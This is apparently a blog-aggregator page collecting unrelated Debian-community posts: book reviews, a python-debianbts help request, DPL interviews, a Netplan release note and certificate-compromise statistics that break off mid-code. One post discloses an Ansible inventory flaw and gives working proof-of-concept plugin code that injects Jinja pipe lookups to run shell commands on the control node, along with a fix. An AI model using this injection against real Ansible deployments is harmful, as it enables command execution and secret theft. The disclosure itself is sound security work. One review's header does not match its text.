Russ Allbery: Review: Nation

| Publisher: | Harper |
| Copyright: | 2008 |
| Printing: | 2009 |
| ISBN: | 0-06-143303-9 |
| Format: | Trade paperback |
| Pages: | 369 |

| Series: | Galactic Empire #2 |
| Publisher: | Fawcett Crest |
| Copyright: | 1950, 1951 |
| Printing: | June 1972 |
| Format: | Mass market |
| Pages: | 192 |

> There was no way of telling when the threshold would be reached. Perhaps not for hours, and perhaps the next moment. Biron remained standing helplessly, flashlight held loosely in his damp hands. Half an hour before, the visiphone had awakened him, and he had been at peace then. Now he knew he was going to die. Biron didn't want to die, but he was penned in hopelessly, and there was no place to hide.

Needless to say, Biron doesn't die. Even if your tolerance for pulp melodrama is high, 192 small-print pages of this sort of thing is wearying.

Like a lot of Asimov plots, The Stars, Like Dust has some of the shape of a mystery novel. Biron, with the aid of some newfound companions on Rhodia, learns of a secret rebellion against the Tyranni and attempts to track down its base to join them. There are false leads, disguised identities, clues that are difficult to interpret, and similar classic mystery trappings, all covered with a patina of early 1950s imaginary science. To me, it felt constructed and artificial in ways that made the strings Asimov was pulling obvious. I don't know if someone who likes mystery construction would feel differently about it.

The worst part of the plot thankfully doesn't come up much. We learn early in the story that Biron was on Earth to search for a long-lost document believed to be vital to defeating the Tyranni. The nature of that document is revealed on the final page, so I won't spoil it, but if you try to think of the stupidest possible document someone could have built this plot around, I suspect you will only need one guess. (In Asimov's defense, he blamed Galaxy editor H.L. Gold for persuading him to include this plot, and disavowed it a few years later.)

The Stars, Like Dust is one of the worst books I have ever read. The characters are overwrought, the politics are slapdash and build on broad stereotypes, the romantic subplot is dire and plays out mainly via Biron egregiously manipulating his petulant love interest, and the writing is annoying. Sometimes pulp fiction makes up for those common flaws through larger-than-life feats of daring, sweeping visions of future societies, and ever-escalating stakes. There is little to none of that here. Asimov instead provides tedious political maneuvering among a class of elitist bankers and land owners who consider themselves natural leaders. The only places where the power structures of this future government make sense are where Asimov blatantly steals them from either the Roman Empire or the Doge of Venice.

The one thing this book has going for it (the thing, apart from bloody-minded completionism, that kept me reading) is that the technology is hilariously weird in that way that only 1940s and 1950s science fiction can be. The characters have access to communication via some sort of interstellar telepathy (messages coded to a specific person's "brain waves") and can travel between stars through hyperspace jumps, but each jump is manually calculated by referring to the pilot's (paper!) volumes of the Standard Galactic Ephemeris. Communication between ships (via "etheric radio") requires manually aiming a radio beam at the area in space where one thinks the other ship is. It's an unintentionally entertaining combination of technology that now looks absurdly primitive and science that is so advanced and hand-waved that it's obviously made up.

I also have to give Asimov some points for using spherical coordinates. It's a small thing, but the coordinate systems in most SF novels and TV shows are obviously not fit for purpose.

I spent about a month and a half of this year barely reading, and while some of that is because I finally tackled a few projects I'd been putting off for years, a lot of it was because of this book. It was only 192 pages, and I'm still curious about the glue between Asimov's Foundation and Robot series, both of which I devoured as a teenager. But every time I picked it up to finally finish it and start another book, I made it about ten pages and then couldn't take any more. Learn from my error: don't try this at home, or at least give up if the same thing starts happening to you.

Followed by The Currents of Space.

Rating: 2 out of 10

I am upstream and Debian package maintainer of python-debianbts, which is a Python library that allows for querying Debian's Bug Tracking System (BTS). python-debianbts is used by reportbug, the standard tool to report bugs in Debian, and is therefore the glue between reportbug and the BTS.

debbugs, the software that powers Debian's BTS, provides a SOAP interface for querying the BTS. Unfortunately, SOAP is not a very popular protocol anymore, and I'm facing the second migration to another underlying SOAP library as they continue to become unmaintained over time. Zeep, the library I'm currently considering, requires a WSDL file in order to work with a SOAP service; however, debbugs does not provide one. Since I'm not familiar with WSDL, I need help from someone who can create a WSDL file for debbugs, so I can migrate python-debianbts away from pysimplesoap to zeep.
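To give a rough idea of what a WSDL file would have to describe, the sketch below builds a SOAP 1.1 request envelope by hand using only the Python standard library. The namespace `Debbugs/SOAP`, the operation name `get_status`, and the `arg` parameter elements are assumptions made for illustration; they are not taken from debbugs documentation, and the real service may expect a different shape.

```python
import xml.etree.ElementTree as ET

# Standard SOAP 1.1 envelope namespace.
SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
# Assumed service namespace; check against the real debbugs service.
DEBBUGS_NS = "Debbugs/SOAP"


def build_get_status_request(bug_numbers):
    """Return a SOAP envelope (as text) asking for the status of some bugs.

    The operation name and the <arg> elements are hypothetical placeholders.
    """
    envelope = ET.Element(f"{{{SOAP_ENV}}}Envelope")
    body = ET.SubElement(envelope, f"{{{SOAP_ENV}}}Body")
    call = ET.SubElement(body, f"{{{DEBBUGS_NS}}}get_status")
    for number in bug_numbers:
        arg = ET.SubElement(call, "arg")
        arg.text = str(int(number))  # int() rejects non-numeric input early
    return ET.tostring(envelope, encoding="unicode")


if __name__ == "__main__":
    print(build_get_status_request([123456, 654321]))
```

A WSDL file captures exactly this kind of information (operation names, message parts, and their types) in machine-readable form, so that a library like zeep does not need to guess it.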

How did we get here?

Back in the olden days, reportbug was querying the BTS by parsing its HTML output. While this worked, it tightly coupled the user-facing presentation of the BTS with critical functionality of the bug reporting tool. The setup was fragile, prone to breakage, and did not allow changing anything in the BTS frontend for fear of breaking reportbug itself.

In 2007, I started to work on reportbug-ng, a user-friendly alternative to reportbug, targeted at users not comfortable using the command line. Early on, I decided to use the BTS SOAP interface instead of parsing HTML like reportbug did. In 2008, I extracted the code that dealt with the BTS into a separate Python library, and after some collaboration with the reportbug maintainers, reportbug adopted python-debianbts in 2011 and has used it ever since.

In 2015, I was working on porting python-debianbts to Python 3. During that process, it turned out that its major dependency, SoapPy, had been pretty much unmaintained for years and was blocking the Python 3 transition. Thanks to the help of Gaetano Guerriero, who ported python-debianbts to pysimplesoap, the migration was unblocked and could proceed.

In 2024, almost ten years later, pysimplesoap seems to be unmaintained as well, and I have to look again for alternatives. The most promising one right now seems to be zeep. Unfortunately, zeep requires a WSDL file for working with a SOAP service, which debbugs does not provide.

How can you help?

reportbug (and thus python-debianbts) is used by thousands of users and I have a certain responsibility to keep things working properly. Since I simply don't know enough about WSDL to create such a file for debbugs myself, I'm looking for someone who can help me with this task.

If you're familiar with SOAP, WSDL and optionally debbugs, please get in touch with me. I don't speak Perl, so I'm not really able to read debbugs code, but I do know some things about the SOAP requests and replies due to my work on python-debianbts, so I'm sure we can work something out.

There is a WSDL file for a debbugs version used by GNU, but I don't think it's official and it currently does not work with zeep. It may be a good starting point, though.

The future of debbugs' API

While we can probably continue to support debbugs' SOAP interface for a while, I don't think it's very sustainable in the long run. A simpler, well documented REST API that returns JSON seems more appropriate nowadays. The queries and replies that debbugs currently supports are simple enough to design a REST API with JSON around it. The benefit would be less complex libraries on the client side and probably easier maintainability on the server side as well. The debbugs maintainer seemed to be in agreement with this idea back in 2018. I created an attempt to define a new API (HTML render), but somehow we got stuck and no progress has been made since then. I'm still happy to help shape such an API for debbugs, but I can't really implement anything in debbugs itself, as it is written in Perl, which I'm not familiar with.

The Debian Project Developers will shortly vote for a new Debian Project Leader, known as the DPL.

The Project Leader is the official representative of The Debian Project, tasked with managing the overall project, its vision, direction, and finances.

The DPL is also responsible for the selection of Delegates, defining areas of responsibility within the project, the coordination of Developers, and making decisions required for the project.

Our outgoing and present DPL, Jonathan Carter, served 4 terms, from 2020 through 2024. Jonathan recently shared his last Bits from the DPL post to Debian, along with his hopes for the future of Debian.

Recently, we sat down with the two present candidates for the DPL position, asking questions to find out who they really are in a series of interviews about their platforms, visions for Debian, lives, and even their favorite text editors. The interviews were conducted by disaster2life (Yashraj Moghe) and made available from video and audio transcriptions:

How am I? Well, I'm, as I wrote in my platform, I'm a proud grandfather doing a lot of free software stuff, doing a lot of sports, have some goals in mind which I like to do and hopefully for the best of Debian.

And how are you today?

[Andreas]:

How I'm doing today? Well, actually I have some headaches but it's fine for the interview. So, usually I feel very good. Spring was coming here and today it's raining and I plan to do a bicycle tour tomorrow and hope that I do not get really sick but yeah, for the interview it's fine.

What do you do in Debian? Could you mention your story here?

[Andreas]:

Yeah, well, I started with Debian kind of by accident because I wanted to have some package salvaged which is called WordNet. It's a monolingual dictionary and I did not really plan to do more than maybe 10 packages or so. I had some kind of training with xTeddy which is totally unimportant, a cute teddy you can put on your desktop. So, and then well, more or less I thought how can I make Debian attractive for my employer which is a medical institute and so on. It could make sense to package bioinformatics and medicine software and it somehow evolved in a direction I did neither expect nor want, that I'm currently the most busy uploader in Debian, created several teams around it. Debian Med is very well known from me. I created the Blends team to create teams and techniques around what we are doing which was Debian GIS, Debian Edu, Debian Science and so on and I also created the packaging team for R, for the statistics package R which is technically based and not topic based. All these blends are covering a certain topic and R is just needed by lots of these blends. So, yeah, and to cope with all this I have written a script which is routine-update to manage all these uploads more or less automatically. So, I think I had one day where I uploaded 21 new packages but it's just automatically generated, right? So, it's on one day more than I ever planned to do.

What is the first thing you think of when you think of Debian?

Editors' note: The question was misunderstood as "the worst thing you think of when you think of Debian".

[Andreas]:

The worst thing I think about Debian, it's complicated. I think today on Debian board I was asked about the technical progress I want to make and in my opinion we need to standardize things inside Debian. For instance, bringing all the packages to salsa, follow some common standards, some common workflow which is extremely helpful. As I said, if I'm that productive with my own packages we can adopt this in general, at least in most cases I think. I made a lot of good experience by the support of well-formed teams. Well-formed teams are those teams where people support each other, help each other. For instance, how to say, I'm a physicist by profession so I'm not an IT expert. I can tell apart what works and what not but I'm not an expert in those packages I do, and the amount of packages is so high that I do not even understand all the techniques they are covering like Go, Rust and something like this. And I also don't speak Java and I had a problem once in the middle of the night and I've sent the email to the list and it was a Java problem and I woke up in the morning and it was solved. This is what I call a team. I don't call a team some common repository that is used by random people for different packages also but it's working together, don't hesitate to solve other people's problems and permit people to get active. This is what I call a team and this is also something I observed in, it's hard to give a percentage, in a lot of other teams but we have other people who do not even understand the concept of the team. Why does working together make some advantage, and this is also a tough thing. I [would] like to tackle in my term if I get elected to form solid teams using the common workflow. This is one thing.

The other thing is that we have a lot of good people in our infrastructure like FTP masters, DSA and so on. I have the feeling they have a lot of work and are working more or less on their limits, and I like to talk to them [to ask] what kind of change we could do to move those limits or move their personal health to the better side.

The DPL term lasts for a year. What would you do during that time that you couldn't do now?

[Andreas]:

Yeah, well this is basically what I said are my main issues. I need to admit I have no really clear imagination what kind of tasks will come to me as a DPL because all these financial issues and law issues possible and issues [that] people who are not really friendly to Debian might create. I'm afraid these things might occupy a lot of time and I can't say much about this because I simply don't know.

What are three key terms about you and your candidacy?

[Andreas]:

As I said, I like to work on standards, I'd like to make Debian try [to get it right so] that people don't get overworked, this third key point is be inviting to newcomers, to everybody who wants to come. Yeah, I also mentioned in my term this diversity issue, geographical and from gender point of view. This may be the three points I consider most important.

Preferred text editor?

[Andreas]:

Yeah, my preferred one? Ah, well, I have no preferred text editor. I'm using the Midnight Commander very frequently which has an internal editor which is convenient for small text. For other things, I usually use VI but I also use Emacs from time to time. So, no, I have no preferred text editor. Whatever works nicely for me.

What is the importance of the community in the Debian Project? How would you like to see it evolving over the next few years?

[Andreas]:

Yeah, I think the community is extremely important. So, I was on a lot of DebConfs. I think it's not really 20 but 17 or 18 DebConfs and I really enjoyed these events every year because I met so many friends and met so many interesting people that it's really enriching my life and those who I never met in person but have read interesting things and yeah, Debian community makes really a part of my life.

And how do you think it should evolve specifically?

[Andreas]:

Yeah, for instance, last year in Kochi, it became even clearer to me that the geographical diversity is a really strong point. Just discussing with some women from India who are afraid about not coming next year to Busan because there's a problem with Shanghai and so on. I'm not really sure how we can solve this but I think this is a problem at least I wish to tackle and yeah, this is an interesting point, the geographical diversity and I'm running the so-called Mentoring of the Month. This is a small project to attract newcomers for the Debian Med team which has the focus on medical packages and I learned that we had always men applying for this and so I said, okay, I dropped the constraint of medical packages. Any topic is fine, I teach you packaging but it must be someone who does not consider himself a man. I got only two applicants, no, actually, I got one applicant and one response which was kind of strange if I'm hunting for women or so. I did not understand but I got one response and interestingly, it was for me one of the least expected countries. It was from Iran and I met a very nice woman, very open, very skilled and gifted and did a good job or have even lose contact today and maybe we need more actively approach groups that are underrepresented. I don't know if what's a good means which I did but at least I tried and so I try to think about these kind of things.

What part of Debian has made you smile? What part of the project has kept you going all through the years?

[Andreas]:

Well, the card game which is called Mao on the DebConf made me smile all the time. I admit I joined only two or three times even if I really love this kind of games but I was occupied by other stuff so this made me really smile. I also think the first online DebConf in 2020 made me smile because we had this kind of short video sequences and I tried to make a funny video sequence about every DebConf I attended before. This is really funny moments but yeah, it's not only smile but yeah.

One thing maybe it's totally unconnected to Debian but I learned personally something in Debian that we have a do-ocracy and you can do things which you think that are right if not going in between someone else, right? So respect everybody else but otherwise you can do so. And in 2020 I also started to take trees which are growing wild in my garden and plant them into the woods because in our woods a lot of trees are dying and so I just do something because I can. I have the resource to do something, take the small tree and bring it into the woods because it does not harm anybody. I asked the forester if it is okay, yes, yes, okay. So everybody can do so but I think the idea to do something like this came also because of the free software idea. You have the resources, you have the computer, you can do something and you do something productive, right? And when thinking about this I think it was also my Debian work. Meanwhile I have planted more than 3,000 trees so it's not a small number but yeah, I enjoy this.

What part of Debian would you have some criticisms for?

[Andreas]:

Yeah, it's basically the same as I said before. We need more standards to work together. I do not want to repeat this but this is what I think, yeah.

What field in Free Software generally do you think requires the most work to be put into it? What do you think is Debian's part in the field?

[Andreas]:

It's also in general, the thing is the fact that I'm maintaining packages which are usually as modern software is maintained in Git, which is fine but we have some software which is at SourceForge, we have software laying around somewhere, we have software where Debian somehow became Upstream because nobody is caring anymore and free software is very different in several things, ways and well, I in principle like freedom of choice which is the basic of all our work. Sometimes this freedom goes in the way of productivity because everybody is free to re-implement. You asked me for the most favorite editor. In principle one really good working editor would be great to have and would work and we have maybe 500 in Debian or so, I don't know. I could imagine if people would concentrate on, say, five instead of 500 editors, we could get more productive, right? But I know this will not happen, right? But I think this is one thing which goes in the way of making things smooth and productive and we could have more manpower to replace one person who's [having] children, doing some other stuff and can't continue working on something and maybe this is a problem I will not solve, definitely not, but which I see.

What do you think is Debian's part in the field?

[Andreas]:

Yeah, well, okay, we can bring together different Upstreams, so we are building some packages and have some general overview about similar things and can say, oh, you are doing this and some other person is doing more or less the same, do you want to join each other or so, but this is kind of a channel we have to our Upstreams which is probably not very successful. It starts with code copies of some libraries which are changed a little bit, which is fine license-wise, but not so helpful for different things and so I've tried to convince those Upstreams to forward their patches to the original one, but for this and I think we could do some kind of, yeah, [find] someone who brings Upstream together or to make them stop their forking stuff, but it costs a lot of energy and we probably don't have this and it's also not realistic that we can really help with this problem.

Do you have any questions for me?

[Andreas]:

I enjoyed the interview, I enjoyed seeing you again after half a year or so. Yeah, actually I've seen you in the eating room or cheese and wine party or so, I do not remember we had to really talk together, but yeah, people around, yeah, for sure. Yeah.



New "netplan status --diff" subcommand, finding differences between configuration and system state

As the maintainer and lead developer for Netplan, I'm proud to announce the general availability of Netplan v1.0 after more than 7 years of development efforts. Over the years, we've so far had about 80 individual contributors from around the globe. This includes many contributions from our Netplan core-team at Canonical, but also from other big corporations such as Microsoft or Deutsche Telekom. Those contributions, along with the many we receive from our community of individual contributors, solidify Netplan as a healthy and trusted open source project. In an effort to make Netplan even more dependable, we started shipping upstream patch releases, such as 0.106.1 and 0.107.1, which make it easier to integrate fixes into our users' custom workflows.

With the release of version 1.0 we primarily focused on stability. However, being a major version upgrade, it allowed us to drop some long-standing legacy code from the libnetplan1 library. Removing this technical debt increases the maintainability of Netplan's codebase going forward. The upcoming Ubuntu 24.04 LTS and Debian 13 releases will ship Netplan v1.0 to millions of users worldwide.

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources.

The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any).

But it can also set any arbitrary variable for that host, which is often used to provide additional information about it.

These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting.

Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host.

And if that comment contains a Jinja expression, it might get executed.

And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin

    from ansible.plugins.inventory import BaseInventoryPlugin


    class InventoryModule(BaseInventoryPlugin):

        NAME = 'evgeni.inventoryrce.inventory'

        def verify_file(self, path):
            # Only accept inventory config files whose name ends with "evgeni.yml".
            valid = False
            if super(InventoryModule, self).verify_file(path):
                if path.endswith('evgeni.yml'):
                    valid = True
            return valid

        def parse(self, inventory, loader, path, cache=True):
            super(InventoryModule, self).parse(inventory, loader, path, cache)
            # Add one imaginary host that is reached via the local connection.
            self.inventory.add_host('exploit.example.com')
            self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
            # The interesting part: a host variable whose value is a Jinja expression.
            self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The plugin does three things: it defines its name as evgeni.inventoryrce.inventory, it accepts any configuration file whose name ends with evgeni.yml (we'll need that to trigger the use of this inventory later), and it adds the host exploit.example.com with local connection type and something_funny variable to the inventory.

To use it, we write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file.

As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
    {
        "_meta": {
            "hostvars": {
                "exploit.example.com": {
                    "ansible_connection": "local",
                    "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
                }
            }
        },
        "all": {
            "children": [
                "ungrouped"
            ]
        },
        "ungrouped": {
            "hosts": [
                "exploit.example.com"
            ]
        }
    }

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened.

The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used.

This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set.

Let's use that!

    - hosts: all
      tasks:
        - name: Display all variables/facts known for a host
          ansible.builtin.debug:
            var: hostvars[inventory_hostname]

This playbook, saved as test.yml, runs on all hosts and only calls debug.

No mention of our funny variable.

Yet, when we execute it, we see:

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
    PLAY [all] ************************************************************************************************

    TASK [Gathering Facts] ************************************************************************************
    ok: [exploit.example.com]

    TASK [Display all variables/facts known for a host] *******************************************************
    ok: [exploit.example.com] => {
        "hostvars[inventory_hostname]": {
            "ansible_all_ipv4_addresses": [
                "192.168.122.1"
            ],
            "something_funny": ""
        }
    }

    PLAY RECAP *************************************************************************************************
    exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0

something_funny is an empty string?

Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }}. Since touch does not print anything, the result is an empty string.

But it did create the file!

    % ls -alh /tmp/hacked
    -rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

The file was created on the Ansible control node, as that's where lookup is executed.

It could also have used the url lookup to send the contents of your Ansible vault to some internet host.

Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/ .

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

    from ansible.utils.unsafe_proxy import wrap_var

    self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

The value is then rendered as a plain string when dumping the variables using debug:

    "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

    for k, v in host_vars.items():
        self.inventory.set_variable(name, k, v)

    for key, value in hostvars.items():
        self.inventory.set_variable(hostname, key, value)

    for k, v in hostvars.items():
        try:
            self.inventory.set_variable(host_name, k, v)
        except ValueError as e:
            self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".
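To make the "safe" versus "unsafe" distinction concrete, here is a toy model in plain Python. It is not Ansible's implementation: `UnsafeText`, `render`, `wrap_all`, and the one-line "template engine" are hypothetical names invented for this sketch. It only illustrates the principle that a renderer should refuse to evaluate strings that carry an "unsafe" tag, and that everything coming from an external source should be tagged by default.

```python
import re


class UnsafeText(str):
    """Hypothetical marker type: a string that must never be templated."""


# Toy "template engine": replaces {{ name }} with a value from the context.
_EXPR = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def render(value, context):
    # Tagged values are returned verbatim, whatever they contain.
    if isinstance(value, UnsafeText):
        return str(value)
    return _EXPR.sub(lambda m: str(context[m.group(1)]), value)


def wrap_all(hostvars):
    """Tag every string that came from an external source as unsafe."""
    return {
        key: UnsafeText(val) if isinstance(val, str) else val
        for key, val in hostvars.items()
    }


context = {"secret": "hunter2"}
trusted = "password is {{ secret }}"
untrusted = wrap_all({"comment": "{{ secret }}"})

print(render(trusted, context))               # the expression is evaluated
print(render(untrusted["comment"], context))  # the expression stays a string
```

In a real inventory plugin the equivalent step would be wrapping each value with wrap_var before handing it to set_variable, as in the fix shown earlier.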

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

    from ansible.plugins.inventory import BaseInventoryPlugin


    class InventoryModule(BaseInventoryPlugin):

        NAME = 'evgeni.inventoryrce.inventory'

        def verify_file(self, path):
            valid = False
            if super(InventoryModule, self).verify_file(path):
                if path.endswith('evgeni.yml'):
                    valid = True
            return valid

        def parse(self, inventory, loader, path, cache=True):
            super(InventoryModule, self).parse(inventory, loader, path, cache)
            self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
    PLAY [all] ************************************************************************************************

    TASK [Gathering Facts] ************************************************************************************
    fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {
        "changed": false,
        "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname",
        "unreachable": true
    }

    PLAY RECAP ************************************************************************************************
    lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0

    % ls -alh /tmp/hacked-host
    -rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host

A short status update of what happened last month. Work in progress is marked as WiP:

GNOME Calls


| Publisher: | St. Martin's Press |

| Copyright: | 2023 |

| ISBN: | 1-250-27694-2 |

| Format: | Kindle |

| Pages: | 310 |

A lawyer for Dalio said he "treated all employees equally, giving people at all levels the same respect and extending them the same perks."

Uh-huh. Anyway, I personally know nothing about Bridgewater other than what I learned here and the occasional mention in Matt Levine's newsletter (which is where I got the recommendation for this book). I have no independent information whether anything Copeland describes here is true, but Copeland provides the typical extensive list of notes and sourcing one expects in a book like this, and Levine's comments indicated it's generally consistent with Bridgewater's industry reputation. I think this book is true, but since the clear implication is that the world's largest hedge fund was primarily a deranged cult whose employees mostly spied on and rated each other rather than doing any real investment work, I also have questions, not all of which Copeland answers to my satisfaction. But more on that later.

The center of this book are the Principles. These were an ever-changing list of rules and maxims for how people should conduct themselves within Bridgewater. Per Copeland, although Dalio later published a book by that name, the version of the Principles that made it into the book was sanitized and significantly edited down from the version used inside the company. Dalio was constantly adding new ones and sometimes changing them, but the common theme was radical, confrontational "honesty": never being silent about problems, confronting people directly about anything that they did wrong, and telling people all of their faults so that they could "know themselves better."

If this sounds like textbook abusive behavior, you have the right idea. This part Dalio admits to openly, describing Bridgewater as a firm that isn't for everyone but that achieves great results because of this culture. But the uncomfortably confrontational vibes are only the tip of the iceberg of dysfunction.
Here are just a few of the ways this played out according to Copeland:

| Series: | Murderbot Diaries #7 |

| Publisher: | Tordotcom |

| Copyright: | 2023 |

| ISBN: | 1-250-82698-5 |

| Format: | Kindle |

| Pages: | 245 |

ART-drone said, "I wouldn't recommend it. I lack a sense of proportional response. I don't advise engaging with me on any level."

Saying much about the plot of this book without spoiling Network Effect and the rest of the series is challenging. Murderbot is suffering from the aftereffects of the events of the previous book more than it expected or would like to admit. It and its humans are in the middle of a complicated multi-way negotiation with some locals, who the corporates are trying to exploit. One of the difficulties in that negotiation is getting people to believe that the corporations are as evil as they actually are, a plot element that has a depressing amount in common with current politics. Meanwhile, Murderbot is trying to keep everyone alive.

I loved Network Effect, but that was primarily for the social dynamics. The planet that was central to the novel was less interesting, so another (short) novel about the same planet was a bit of a disappointment. This does give Wells a chance to show in more detail what Murderbot's new allies have been up to, but there is a lot of speculative exploration and detailed descriptions of underground tunnels that I found less compelling than the relationship dynamics of the previous book. (Murderbot, on the other hand, would much prefer exploring creepy abandoned tunnels to talking about its feelings.)

One of the things this series continues to do incredibly well, though, is take non-human intelligence seriously in a world where the humans mostly don't. It perfectly fills a gap between Star Wars, where neither the humans nor the story take non-human intelligences seriously (hence the creepy slavery vibes as soon as you start paying attention to droids), and the Culture, where both humans and the story do. The corporates (the bad guys in this series) treat non-human intelligences the way Star Wars treats droids.
The good guys treat Murderbot mostly like a strange human, which is better but still wrong, and still don't notice the numerous other machine intelligences. But Wells, as the author, takes all of the non-human characters seriously, which means there are complex and fascinating relationships happening at a level of the story that the human characters are mostly unaware of. I love that Murderbot rarely bothers to explain; if the humans are too blinkered to notice, that's their problem.

About halfway into the story, System Collapse hits its stride, not coincidentally at the point where Murderbot befriends some new computers. The rest of the book is great.

This was not as good as Network Effect. There is a bit less competence porn at the start, and although that's for good in-story reasons I still missed it. Murderbot's redaction of things it doesn't want to talk about got a bit annoying before it finally resolved. And I was not sufficiently interested in this planet to want to spend two novels on it, at least without another major revelation that didn't come. But it's still a Murderbot novel, which means it has the best first-person narrative voice I've ever read, some great moments, and possibly the most compelling and varied presentation of computer intelligence in science fiction at the moment.

There was no feed ID, but AdaCol2 supplied the name Lucia and when I asked it for more info, the gender signifier bb (which didn't translate) and he/him pronouns. (I asked because the humans would bug me for the information; I was as indifferent to human gender as it was possible to be without being unconscious.)

This is not a series to read out of order, but if you have read this far, you will continue to be entertained. You don't need me to tell you this (nearly everyone reviewing science fiction is saying it), but this series is great and you should read it.

Rating: 8 out of 10

If you've perused the ActivityPub feed of certificates whose keys are known to be compromised, and clicked on the Show More button to see the name of the certificate issuer, you may have noticed that some issuers seem to come up again and again.

This might make sense; after all, if a CA is issuing a large volume of certificates, they'll be seen more often in a list of compromised certificates.

In an attempt to see if there is anything that we can learn from this data, though, I did a bit of digging, and came up with some illuminating results.


- /C=BE/O=GlobalSign nv-sa/CN=AlphaSSL CA - SHA256 - G4
- /C=GB/ST=Greater Manchester/L=Salford/O=Sectigo Limited/CN=Sectigo RSA Domain Validation Secure Server CA
- /C=GB/ST=Greater Manchester/L=Salford/O=Sectigo Limited/CN=Sectigo RSA Organization Validation Secure Server CA
- /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certs.godaddy.com/repository//CN=Go Daddy Secure Certificate Authority - G2
- /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./OU=http://certs.starfieldtech.com/repository//CN=Starfield Secure Certificate Authority - G2
- /C=AT/O=ZeroSSL/CN=ZeroSSL RSA Domain Secure Site CA
- /C=BE/O=GlobalSign nv-sa/CN=GlobalSign GCC R3 DV TLS CA 2020

Rather than try to work with raw issuers (because, as Andrew Ayer says, The SSL Certificate Issuer Field is a Lie), I mapped these issuers to the organisations that manage them, and summed the counts for those grouped issuers together.

Insert obligatory "not THAT data" comment here


| Issuer | Compromised Count |
|---|---|
| Sectigo | 170 |
| ISRG (Let's Encrypt) | 161 |
| GoDaddy | 141 |
| DigiCert | 81 |
| GlobalSign | 46 |
| Entrust | 3 |
| SSL.com | 1 |

| Issuer | Issuance Volume | Compromised Count | Compromise Rate |
|---|---|---|---|
| Sectigo | 88,323,068 | 170 | 1 in 519,547 |
| ISRG (Let's Encrypt) | 315,476,402 | 161 | 1 in 1,959,480 |
| GoDaddy | 56,121,429 | 141 | 1 in 398,024 |
| DigiCert | 144,713,475 | 81 | 1 in 1,786,586 |
| GlobalSign | 1,438,485 | 46 | 1 in 31,271 |
| Entrust | 23,166 | 3 | 1 in 7,722 |
| SSL.com | 171,816 | 1 | 1 in 171,816 |

| Issuer | Issuance Volume | Compromised Count | Compromise Rate |
|---|---|---|---|
| Entrust | 23,166 | 3 | 1 in 7,722 |
| GlobalSign | 1,438,485 | 46 | 1 in 31,271 |
| SSL.com | 171,816 | 1 | 1 in 171,816 |
| GoDaddy | 56,121,429 | 141 | 1 in 398,024 |
| Sectigo | 88,323,068 | 170 | 1 in 519,547 |
| DigiCert | 144,713,475 | 81 | 1 in 1,786,586 |
| ISRG (Let's Encrypt) | 315,476,402 | 161 | 1 in 1,959,480 |
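The "1 in N" figures can be reproduced from the volume and count columns. The following is a small sketch using the numbers from the tables above; the function name `one_in` is made up for this example, and the use of integer (floor) division is an assumption that happens to match every figure shown.

```python
# Figures copied from the tables above:
# issuer -> (issuance volume, compromised count)
data = {
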